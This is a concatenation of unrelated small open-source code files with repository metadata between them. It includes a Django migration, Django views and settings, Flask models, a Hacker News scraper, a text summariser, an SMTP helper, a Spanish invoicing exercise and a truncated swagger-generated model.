# Generated by Django 3.0.5 on 2020-12-20 06:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Adds the Foodstuff, UserEat and MyRecipe tables on top of migration
    # 0027 (which introduced MenuInfo).  Auto-generated by Django 3.0.5;
    # do not edit field definitions by hand once applied.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('menu', '0027_menuinfo'),
    ]
    operations = [
        # Foodstuff: an ingredient with per-point gram/score columns.
        migrations.CreateModel(
            name='Foodstuff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, null=True)),
                ('one_point_gram', models.FloatField()),
                ('one_point', models.FloatField()),
                ('two_point', models.FloatField()),
                ('three_point', models.FloatField()),
                ('four_point', models.FloatField()),
            ],
        ),
        # UserEat: records which user ate which menu at which meal time.
        # eatTime choices are Japanese meal labels (breakfast/lunch/dinner/snack).
        migrations.CreateModel(
            name='UserEat',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('eatTime', models.IntegerField(choices=[(1, '朝食'), (2, '昼食'), (3, '夕食'), (4, '間食')])),
                ('date', models.DateField(auto_now_add=True)),
                ('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatmenu', to='menu.MenuInfo')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatuser', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # MyRecipe: join table linking a menu to its ingredients with a gram amount.
        migrations.CreateModel(
            name='MyRecipe',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gram', models.FloatField()),
                ('foodstuff', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipestuff', to='menu.Foodstuff')),
                ('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipemenu', to='menu.MenuInfo')),
            ],
        ),
    ]
|
[
"18jz0129@jec.ac.jp"
] |
18jz0129@jec.ac.jp
|
cb4ceece3e859d4af57c7b4bc35b7c12546e1c09
|
b329784883875fea0d655f4371549c400ab876a7
|
/news.py
|
5cc3035a0d6bf571d225ffb8a12fb412c8575b22
|
[] |
no_license
|
veekaybee/markovhn
|
9ce8b4159c483bbc0629bf9cc51d0eba591bd553
|
99f5eefc292fc511d1f89b1acbf1ba0199245b16
|
refs/heads/master
| 2021-01-23T18:50:48.906754
| 2015-08-24T11:46:41
| 2015-08-24T11:46:41
| 41,229,413
| 15
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 675
|
py
|
# Python 2 script (urllib2 and a bytes write to a text-mode file): fetches
# the current Hacker News top-story ids, then writes each story title to
# headlines.txt.  NOTE(review): one blocking HTTP request per story id
# (~500 requests) and no error handling -- fine for a one-off scrape.
import urllib2
import json
#HackerNews API documentation: https://github.com/HackerNews/API
api_url='https://hacker-news.firebaseio.com/v0/topstories.json'
item_url='https://hacker-news.firebaseio.com/v0/item/'
#Pull all story numbers into a Python data dictionary
response = urllib2.urlopen(api_url)
data=json.load(response)
#Takes each story number and extracts the title by treating as Python dictionary
with open("headlines.txt", "w") as output_file:
    for i in data:
        # Build the per-item endpoint, e.g. .../item/8863.json?print=pretty
        genurl="%s%s.json?print=pretty" % (item_url, i)
        item_response=urllib2.urlopen(genurl)
        parsed_response=json.load(item_response)
        output_file.write(parsed_response["title"].encode('utf-8'))
|
[
"vicki.boykis@gmail.com"
] |
vicki.boykis@gmail.com
|
e2450988f82302bcbaff58abb9d993b553804b16
|
0adbbf6092f5444b623ccbf3b81206d027c96b68
|
/23.py
|
ed2e63159145735c587c65da81d422e54ba334cf
|
[] |
no_license
|
c1c51/python-crap
|
bc3fe076e42aa0f5843879b7af56314b09e5f931
|
f16782fca27ac616e043b5e1c71da8fddef0f848
|
refs/heads/master
| 2021-05-10T09:55:38.465484
| 2018-01-25T17:19:57
| 2018-01-25T17:19:57
| 118,942,213
| 0
| 0
| null | 2018-01-25T17:20:37
| 2018-01-25T17:02:40
|
Python
|
UTF-8
|
Python
| false
| false
| 125
|
py
|
# Area of a w x l rectangle minus the area of a circle of radius r.
w = int(input("width?"))
l = int(input("length?"))
r = int(input("radius?"))
pi = 3.14159265358979323846264338
print(w * l - r * r * pi)
|
[
"noreply@github.com"
] |
noreply@github.com
|
e4a7172c8a987feebc4e08c448cc4dc8bfc40b73
|
913334a96677deb9a199d4a7244a4fa56e989fa7
|
/5flask_demo/modles.py
|
b90abf5bc7e9a32e86e2ee62ce28a818258daaff
|
[] |
no_license
|
KangZhengweiGH/flask_demos
|
7bd4b64f252055017f512f6fb348c885c377f241
|
1a0c621c8f0bd44fd583b026ef575990b5dda706
|
refs/heads/master
| 2020-05-16T07:28:24.055118
| 2019-05-08T01:00:30
| 2019-05-08T01:00:30
| 182,879,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
# coding=utf-8
from extend import db
class User(db.Model):
    # Site user account.  NOTE(review): "isdelate" looks like a typo for
    # "is_deleted", but renaming it would change the DB column -- left as-is.
    __tablename__ = 'user'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String(12), nullable=True, unique=True)
    telnumber = db.Column(db.Integer, nullable=False, unique=True)
    password = db.Column(db.String(100), nullable=False)  # stored value; hashing not visible here
    vip = db.Column(db.BOOLEAN, default=False)      # paid membership flag
    isdelate = db.Column(db.BOOLEAN, default=False)  # soft-delete flag
    logintime = db.Column(db.DateTime, nullable=True)
# Many-to-many association tables: a category can hold many books/chapters
# and each book/chapter can belong to several categories.
category_book = db.Table('category_book',
                         db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
                         db.Column('book_id', db.Integer, db.ForeignKey('book.id'), primary_key=True))
category_chapter = db.Table('category_chapter',
                            db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
                            db.Column('chapter_id', db.Integer, db.ForeignKey('chapter.id'), primary_key=True))
class Category(db.Model):
    # Sub-category; each belongs to a parent Fatherc category.
    __tablename__ = 'category'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String(50), nullable=False)
    fatherc_id = db.Column(db.Integer, db.ForeignKey('fatherc.id'))
    # Reverse accessor: fatherc.categorys lists a parent's sub-categories.
    fatherc = db.relationship('Fatherc', backref=db.backref('categorys'))
class Fatherc(db.Model):
    # Top-level ("father") category grouping Category rows.
    __tablename__ = 'fatherc'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String(50), nullable=False)
class Book(db.Model):
    # A book with VIP gating; categorised through the category_book table.
    __tablename__ = 'book'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String(50), nullable=False)
    need_vip = db.Column(db.BOOLEAN, default=False)   # True = VIP-only content
    introduce = db.Column(db.Text, nullable=True)     # blurb / description
    book_image = db.Column(db.String(50), nullable=True)  # cover image path
    isdelate = db.Column(db.BOOLEAN, default=False)   # soft-delete flag (typo kept: DB column)
    # Original author note ("this foreign key is not needed, big pitfall"):
    # the many-to-many relation below replaces a direct FK to category.
    # category_id = db.Column(db.Integer, db.ForeignKey('category.id'))
    category = db.relationship('Category', secondary=category_book, backref=db.backref('books'))
class Chapter(db.Model):
    # A chapter of a Book; also independently categorisable via category_chapter.
    __tablename__ = 'chapter'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String(50), nullable=False)
    need_vip = db.Column(db.BOOLEAN, default=False)  # per-chapter VIP gate
    book_id = db.Column(db.Integer, db.ForeignKey('book.id'))
    book = db.relationship('Book', backref=db.backref('chapters'))
    category = db.relationship('Category', secondary=category_chapter, backref=db.backref('chapters'))
# class Artical(db.Model):
# __tablename__ = 'articals'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
#
#
# class Comment(db.Model):
# __tablename__ = 'comments'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
|
[
"email@1101186901.com"
] |
email@1101186901.com
|
6d99627b90704b1feee0b966f1164aaffdfc291c
|
ad0e6decddcbd6bafce08075c04fcc5d1824513e
|
/abs_try.py
|
50b59bf80a1f14f6df5525812e0a4ffb13972103
|
[] |
no_license
|
sihanj/nlp_test2
|
dc95cf087dfd9a799e83a7fb4d8b543e51153dcc
|
4cd10b90ebe19724fa17f254be62574bb069987a
|
refs/heads/master
| 2020-03-25T20:54:16.004753
| 2019-04-22T04:46:05
| 2019-04-22T04:46:05
| 144,150,640
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,840
|
py
|
import re
import jieba
import networkx as nx
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
#分句
def cut_sentence(sentence):
    """Yield sentences from *sentence*, split after each full-width
    terminator (。?!); a trailing fragment without a terminator is
    yielded as-is."""
    if not isinstance(sentence, str):
        # bytes input: decode first (keeps the original's py2/py3 tolerance)
        sentence = sentence.decode('utf-8')
    terminators = frozenset(u'。?!')
    pending = []
    for char in sentence:
        pending.append(char)
        if char in terminators:
            yield ''.join(pending)
            pending = []
    if pending:
        yield ''.join(pending)
#停用词
def load_stopwords(path='stopwords.txt'):
    """Read *path* (UTF-8, one stopword per line), strip whitespace,
    drop empty lines, and return the words as a frozenset."""
    with open(path, encoding='utf-8') as fh:
        words = [line.strip() for line in fh]
    return frozenset(w for w in words if w)
#分词
def cut_words(sentence):
    # Tokenize *sentence* with jieba and drop stopwords; returns a lazy
    # filter object.  NOTE(review): re-reads the stopword file on every
    # call -- callers in a loop may want to hoist load_stopwords().
    stopwords=load_stopwords()
    return filter(lambda x: not stopwords.__contains__(x),jieba.cut(sentence))
#摘要
def get_abstract(content,size=3):
    # Extractive summarisation: split into sentences, build a TF-IDF
    # sentence-similarity graph, rank sentences with PageRank (TextRank),
    # and return (lazily, as a map object) the top *size* sentences in
    # rank order.
    docs=list(cut_sentence(content))
    tfidf_model=TfidfVectorizer(tokenizer=jieba.cut,stop_words=load_stopwords())
    tfidf_matrix=tfidf_model.fit_transform(docs)
    normalized_matrix=TfidfTransformer().fit_transform(tfidf_matrix)
    # NOTE(review): nx.from_scipy_sparse_matrix was removed in networkx 3.x
    # (from_scipy_sparse_array replaces it) -- this assumes networkx < 3.
    similarity=nx.from_scipy_sparse_matrix(normalized_matrix*normalized_matrix.T)
    scores=nx.pagerank(similarity)
    tops=sorted(scores.items(),key=lambda x:x[1],reverse=True)
    size=min(size,len(docs))   # never ask for more sentences than exist
    indices=list(map(lambda x:x[0],tops))[:size] #list
    return map(lambda idx:docs[idx],indices)
a=input('请输入文档:')
a= re.sub(u'[ , ]',u'',a)
print('摘要为:')
abs=[]
for i in get_abstract(a):
abs.append(i)
print(str(abs).replace("'",'').replace(",",'').replace(" ","").replace("[","").replace("]",""))
input('任意键退出程序')
|
[
"noreply@github.com"
] |
noreply@github.com
|
11c23983d7ab4baebc227f5160e0120c3f42e04c
|
c0397a0617f2603dc5dbd0af44462e561a52ea18
|
/views.py
|
1b14f569ef0fd7a8ea1427db41bf9e8082f69ff5
|
[] |
no_license
|
PujariSrinivas/Django
|
c865dddfaef3e7221597cf9f5e911241300d2825
|
e94333926daef4a478ffa83c0f6c997700427696
|
refs/heads/master
| 2023-06-05T19:14:55.633274
| 2021-06-25T04:50:41
| 2021-06-25T04:50:41
| 378,155,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse("Hi Good Evening to All...")
def htmltag(y):
return HttpResponse("<h2>Hi Welcome to APSSDC</h2>")
def usernameprint(request,uname):
return HttpResponse("<h2>Hi Welcome <span style='color:green'>{}</span></h2>".format(uname))
def usernameage(request,un,ag):
return HttpResponse("<h3 style='text-align:center;background-color:green'>My name is <span style='color:yellow'>{}</span> and my age is: <span style='color:red'>{}</span></h3>".format(un,ag))
def empdetails(request,eid,ename,eage):
return HttpResponse("<script>alert('Hi Welcome {}')</script><h3>Hi Welcome {} and your age is {} and your id is {}</h3>".format(ename,ename,eage,eid))
def htm(request):
return render(request,'html/basics.html')
def ytname(request,name):
return render(request,'html/ytname.html',{'n':name})
def empname(request,id,name):
k = {'i':id,'n':name}
return render(request,'html/ehtml.html',k)
def studentdetails(request):
return render(request,'html/stud.html')
def internaljs(request):
return render(request,'html/internaljs.html')
def myform(request):
    """Render the form on GET; on POST echo the submitted fields back
    through html/display.html."""
    if request.method == "POST":
        payload = {
            'username': request.POST['uname'],
            'rno': request.POST['rollno'],
            'emailid': request.POST['email'],
        }
        print(payload['username'], payload['rno'], payload['emailid'])
        return render(request, 'html/display.html', payload)
    return render(request, 'html/form.html')
def bootstrap(request):
return render(request,'html/boot.html')
def Registration(request):
    """Registration form view.

    GET  -> render the (blank) registration page.
    POST -> collect the submitted fields and re-render the page with them.

    Fix: the original built the ``data`` context dict on POST but never
    passed it to render(), so the template could not see the submission.
    """
    if request.method == "POST":
        fname = request.POST['fname']
        lname = request.POST['lname']
        rollno = request.POST['rollno']
        email = request.POST['email']
        phoneno = request.POST['phoneno']
        print(fname, lname, rollno, email, phoneno)
        data = {'firstname': fname, 'lastname': lname, 'rno': rollno,
                'emailid': email, 'pno': phoneno}
        return render(request, 'html/Registration.html', data)
    return render(request, 'html/Registration.html')
|
[
"noreply@github.com"
] |
noreply@github.com
|
23fbea60c2bea452a414dcf5f255cd4eabdab38a
|
437e905d8c214dc25c559b1dc03eaf9f0c85326f
|
/is28/vyacheslavleva28/lab6/function.py
|
1522faa137dc1fcb8f84d4cc4b96a551fd47870d
|
[] |
no_license
|
AnatolyDomrachev/karantin
|
542ca22c275e39ef3491b1c0d9838e922423b5a9
|
0d9f60207e80305eb713fd43774e911fdbb9fbad
|
refs/heads/master
| 2021-03-29T03:42:43.954727
| 2020-05-27T13:24:36
| 2020-05-27T13:24:36
| 247,916,390
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
def vvod():
    """Read ten floats from standard input and return them as a list."""
    return [float(input()) for _ in range(10)]
def rachet(a):
    """Return True if the sequence *a* is non-decreasing, else False."""
    for left, right in zip(a, a[1:]):
        if left > right:
            return False
    return True
def vyvod(data):
    """Print the value passed in.

    Fix: the original printed the module-level global ``result`` instead of
    its ``data`` parameter, so it only worked by accident when that global
    existed.
    """
    print(data)
# Read ten numbers, echo them, and report whether they are sorted.
data = vvod()
print(data)
result = rachet(data)
print(result)
# Fix: the original additionally did `print(vyvod)`, which dumped the
# function object's repr -- clearly unintended; only the call remains.
vyvod(result)
|
[
"you@example.com"
] |
you@example.com
|
ce65095ee46c58e871cd6b80c4cfe769ace6e7a1
|
f5f7f8d12956e4bff6e1c5f6fab10b006690f195
|
/luffy/settings.py
|
fe7c34ae1af2839496be8ef590c0c49e0a16121b
|
[] |
no_license
|
chenrun666/luffy
|
1fbee911d1d7f86e5c7b1ed7f47e84f6f1ee9846
|
59f6229e16978ab9c40ef948807c717c2cddaea9
|
refs/heads/master
| 2020-04-07T16:09:20.306754
| 2018-11-21T08:45:29
| 2018-11-21T08:45:29
| 158,517,404
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,582
|
py
|
"""
Django settings for luffy project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h*zthsj)s$^_5kxkdbk+^gy2ih+vh6kpw#wu$uy^0bce((+k)9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'course.apps.CourseConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'course.mymiddleware.accessmiddleware.CrossDomainMiddleWare',
]
ROOT_URLCONF = 'luffy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'luffy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
# "PASSWORD": "密码",
}
}
}
|
[
"17610780919@163.com"
] |
17610780919@163.com
|
3263908d9d30879e4febda3d96c3f7a74b399214
|
9a21850ff752b6bd148a9dfbadd210419c2d4a6e
|
/posts/posts.py
|
39bb7bcbfa0e3cbcd84aaeef44c77b06619a2603
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
importcjj/Posts
|
7d3a9a04f829e92027c310f0daf8be259d4a91a9
|
fc2abe1c48fa09af820a25c4cc00520253a6b7f1
|
refs/heads/master
| 2021-01-10T09:43:07.401682
| 2016-04-20T05:24:36
| 2016-04-20T05:24:36
| 49,366,691
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,705
|
py
|
# -*- coding: utf-8 -*-
import smtplib
import socket
from contextlib import contextmanager
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
class PostSMTP(smtplib.SMTP):
def __init__(self, sender, alias=None, host='', port=0,
local_hostname=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
smtplib.SMTP.__init__(self, host, port, local_hostname, timeout)
self._sender = sender
self._sender_alias = alias if alias else sender.split('@')[0]
self._attachments = {}
self._mails = []
def attach(self, attachments):
"""Add attachments.
Args:
attachments (dict): attachments
example: {'alias_name': 'path/to/filename'}
Returns:
obj to support chain calling.
"""
try:
iteritems = attachments.iteritems()
except AttributeError:
iteritems = attachments.items()
for k, v in iteritems:
self._attachments[k] = v
return self
def _header(self, msg, recipient, subject):
msg['Subject'] = subject
msg['From'] = '{} <{}>'.format(self._sender_alias, self._sender)
msg['To'] = ', '.\
join(recipient) if isinstance(recipient, list) else recipient
return msg
def _mount(self, mail, files):
for _ in files:
mail['msg'].attach(_)
return mail
def _load_files(self):
files = []
try:
iteritems = self._attachments.iteritems()
except AttributeError:
iteritems = self._attachments.items()
for k, v in iteritems:
with open(v, 'rb') as f:
part = MIMEApplication(f.read())
part.add_header('Content-Disposition', 'attachment', filename=k)
part.add_header('Content-ID', '<{}>'.format(k))
files.append(part)
return files
def text(self, recipient, subject, content, charset='us-ascii'):
_text = MIMEText(content, _subtype='plain', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_text)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def html(self, recipient, subject, content, charset='utf-8'):
_html = MIMEText(content, _subtype='html', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_html)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def _send(self):
files = self._load_files()
for mail in self._mails:
self._mount(mail, files)
self.sendmail(
self._sender,
mail['recipient'],
mail['msg'].as_string())
class Posts(object):
    """Factory for SMTP mail sessions.

    Holds the server/credential configuration; calling the instance yields
    a connected, logged-in PostSMTP inside a context manager.  Queued mails
    are sent on clean exit of the ``with`` block and the connection is
    always closed, even on error.
    """

    def __init__(self, host, usermame, password, port=25):
        # NOTE: the "usermame" parameter name is a typo in the original
        # public interface; kept so keyword callers are not broken.
        self._host = host
        self._port = port
        self._username = usermame
        self._password = password

    @contextmanager
    def __call__(self, sender=None, alias=None, ssl=False):
        """Yield a ready-to-use PostSMTP for *sender* (defaults to the
        configured username); ``ssl=True`` upgrades via STARTTLS."""
        sender = sender if sender else self._username
        self._smtp = PostSMTP(sender, alias)
        # Fix: the configured ``port`` was previously ignored --
        # connect() was called with the host only, always using port 25.
        self._smtp.connect(self._host, self._port)
        if ssl:
            self._smtp.ehlo()
            self._smtp.starttls()
            self._smtp.ehlo()
        self._smtp.login(self._username, self._password)
        try:
            yield self._smtp
            self._smtp._send()
        finally:
            self._smtp.quit()
|
[
"importcjj@gmail.com"
] |
importcjj@gmail.com
|
b6075930272e040694012e964f04ec7d4bd71de8
|
7b314c39de4851891f334017f10698b30edbf610
|
/main.py
|
527531e35463c73e1899b1f65945dd95519f8a2a
|
[] |
no_license
|
angelolihas/testapp1api
|
8720d6e0b4bbdeb4f048583f64ad3fd33eb9e371
|
dfa12a8c83d00eaa6d060997dd759580a7956bf6
|
refs/heads/master
| 2023-01-07T03:10:22.156623
| 2020-11-12T23:49:40
| 2020-11-12T23:49:40
| 312,423,850
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 205
|
py
|
import requests
def get_request(url='URL'):
    """Issue an HTTP GET to *url*, print and return the decoded JSON body.

    Generalisation: the endpoint was hard-coded to the placeholder string
    'URL'; it is now a parameter with the same default, so the existing
    zero-argument call site keeps its behaviour.  Raises
    requests.exceptions.RequestException on network failure and a JSON
    decode error if the body is not valid JSON.
    """
    response = requests.get(url)
    json_response = response.json()
    print(json_response)
    return json_response
if __name__ == '__main__':
get_request()
|
[
"angelo.lihas@gmail.com"
] |
angelo.lihas@gmail.com
|
b9b22ed2ac4565940e04c8fac0f36e72bf88ef75
|
eb61d62ca1f6f0123e3771105f5dfbbd6115138d
|
/.history/23-08-21_20210912011408.py
|
d242edf35564cc66ff35c5dd66a540fa6f9fc0b8
|
[] |
no_license
|
Alopezm5/CORRECTO-2
|
e0f14bcc3a88c0e222d10e3261e68532008bc42e
|
223613f1fb04dce3fac9f82f243cb2f22fe100f3
|
refs/heads/main
| 2023-07-29T06:52:48.147424
| 2021-09-12T20:33:27
| 2021-09-12T20:33:27
| 388,995,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,944
|
py
|
class Empresa:
    """Company issuing the invoices: name, RUC tax id, phone and address."""

    def __init__(self, nom="El mas barato", ruc="0999999999",
                 tel="042971234", dir="Juan Montalvo"):
        self.nombre = nom
        self.ruc = ruc
        self.telefono = tel
        self.direccion = dir

    def mostrarEmpresa(self):
        """Print a one-line summary: padded name plus RUC."""
        print("Empresa: {:17}, RUC: {}".format(self.nombre, self.ruc))
class Cliente:
    """Base customer record: name, national id (cedula) and phone."""

    def __init__(self, nom, ced, tel):
        self.nombre = nom
        self.cedula = ced
        self.telefono = tel

    def mostrarCliente(self):
        """Print the customer's fields separated by spaces."""
        print(self.nombre, self.cedula, self.telefono)
class ClienteCorporativo(Cliente):
    """Corporate customer: a Cliente plus a contract identifier.

    Fix: the original __init__ declared a fused parameter ``telecontrato``
    yet referenced the undefined names ``tele`` and ``contrato`` and passed
    four arguments to Cliente.__init__ (which takes three), so every
    instantiation raised.  The intended signature is
    (nomb, cedu, tele, contrato), matching the sibling ClientePersonal.
    """

    def __init__(self, nomb, cedu, tele, contrato):
        super().__init__(nomb, cedu, tele)
        self.__contrato = contrato  # private; exposed through the property

    @property
    def contrato(self):
        """Contract id (getter for the private attribute)."""
        return self.__contrato

    @contrato.setter
    def contrato(self, value):
        # Falsy values fall back to a "no contract" sentinel string.
        self.__contrato = value if value else "Sin contrato"

    def mostrarCliente(self):
        """Print name and contract id."""
        print(self.nombre, self.__contrato)
class ClientePersonal(Cliente):
    """Retail customer: a Cliente plus a promotion flag."""

    def __init__(self, nom, ced, tel, promocion=True):
        super().__init__(nom, ced, tel)
        self.__promocion = promocion  # private; read-only via the property

    @property
    def promocion(self):
        """Read-only promotion flag."""
        return self.__promocion

    def mostrarCliente(self):
        """Print name and promotion flag."""
        print(self.nombre, self.__promocion)
class Articulo:
    """Inventory article with an auto-assigned sequential code.

    Class attributes:
      secuencia -- running counter used to assign each instance's ``codigo``
      iva       -- VAT rate (0.12); a plain float, NOT a method
    """

    secuencia = 0
    iva = 0.12

    def __init__(self, des, pre, sto):
        Articulo.secuencia += 1
        self.codigo = Articulo.secuencia  # 1-based id in creation order
        self.descripcion = des
        self.precio = pre
        self.stock = sto

    def mostraArticulo(self):
        """Print the article's code and description.

        Fix: the original printed ``self.nombre``, an attribute Articulo
        never defines, so every call raised AttributeError.
        """
        print(self.codigo, self.descripcion)
class DetVenta:
    """One invoice detail line: an article, its unit price snapshot and a
    quantity.  Line numbers come from a class-wide counter."""

    linea = 0  # class-wide line counter

    def __init__(self, articulo, cantidad):
        DetVenta.linea += 1
        self.lineaDetalle = DetVenta.linea
        self.articulo = articulo
        # Snapshot the article's current price so later price changes do
        # not rewrite existing invoice lines.
        self.precio = articulo.precio
        self.cantidad = cantidad
class CabVenta:
    # Invoice header: ties a company and a client to a list of DetVenta
    # detail lines, accumulating the running total.
    def __init__(self,fac,empresa,fecha,cliente,tot=0):
        self.empresa=empresa
        self.factura=fac
        self.fecha=fecha
        self.cliente=cliente
        self.total=tot
        self.detalleVen=[]   # DetVenta instances added via agregarDetalle
    def agregarDetalle(self,articulo,cantidad):
        # Create a detail line and add its amount (price * qty) to the total.
        detalle=DetVenta(articulo,cantidad)
        self.total+=detalle.precio*detalle.cantidad
        self.detalleVen.append(detalle)
    def mostrarVenta(self,empNombre,empRuc):
        # NOTE(review): prints a literal placeholder and ignores both
        # parameters -- looks unfinished; presumably meant to format
        # empNombre/empRuc into the header.  Left as-is pending author intent.
        print("Empresa {:17} r")
# --- demo / smoke test ---------------------------------------------------
cli1 = ClientePersonal("Jose", "0912231499", "042567890", True)
cli1.mostrarCliente()  # fix: original was missing the call parentheses (no-op)
art1 = Articulo("Aceite", 2, 100)
art1.mostraArticulo()
art2 = Articulo("Coca Cola", 1, 200)
art2.mostraArticulo()
art3 = Articulo("Leche", 1.5, 200)
art3.mostraArticulo()
print(Articulo.iva)  # fix: iva is a float class attribute, not callable
|
[
"85761855+Alopezm5@users.noreply.github.com"
] |
85761855+Alopezm5@users.noreply.github.com
|
06aae58ab947c90ed7bc942a02ffa420afd0287b
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flashblade/FB_2_6/models/network_interface_trace_get_response.py
|
711d740178ee303c6379e1c1ec389c67bd15cca7
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972
| 2023-08-25T07:40:41
| 2023-08-25T07:40:41
| 160,391,444
| 18
| 29
|
BSD-2-Clause
| 2023-09-08T09:08:30
| 2018-12-04T17:02:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,335
|
py
|
# coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.6, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_6 import models
class NetworkInterfaceTraceGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'continuation_token': 'str',
'total_item_count': 'int',
'items': 'list[NetworkInterfaceTrace]'
}
attribute_map = {
'continuation_token': 'continuation_token',
'total_item_count': 'total_item_count',
'items': 'items'
}
required_args = {
}
def __init__(
self,
continuation_token=None, # type: str
total_item_count=None, # type: int
items=None, # type: List[models.NetworkInterfaceTrace]
):
"""
Keyword args:
